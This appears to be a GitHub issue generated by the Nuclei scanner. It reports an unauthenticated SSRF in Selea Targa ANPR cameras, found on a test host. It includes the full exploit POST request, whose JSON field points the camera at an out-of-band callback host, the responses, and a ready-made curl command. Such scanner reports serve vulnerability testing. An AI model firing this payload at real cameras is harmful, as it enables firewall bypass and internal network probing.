search

mkrs2404 / tickets

0 stars 0 forks source link

Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF (targa-camera-ssrf) found on honey.scanme.sh #47

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: targa-camera-ssrf matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE

Timestamp: Tue Apr 30 19:28:18 +0530 IST 2024

Template Information

Key Value
Name Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF
Authors gy741
Tags targa, ssrf, oast, iot, camera, selea
Severity high
Description Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.

Request

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Content-Length: 250
Accept: */*
content-type: application/json
Accept-Encoding: gzip

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Content-Type: application/json
Date: Tue, 30 Apr 2024 13:58:12 GMT

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Connection: close
Content-Length: 250
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Interaction Data

http Interaction from 67.205.158.113 at coofgv4mjeun8ktjo61g7erc3q4okuicn Interaction Request

GET / HTTP/1.1
Host: coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1

Interaction Response

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.8

<html><head></head><body>nciuko4q3cre7g16ojtk8nuejm4vgfooc</body></html>

References:

CURL command

curl -X 'POST' -d '{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}' -H 'Accept: */*' -H 'Host: honey.scanme.sh' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8' -H 'content-type: application/json' 'https://honey.scanme.sh/cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE'

Generated by Nuclei v3.2.5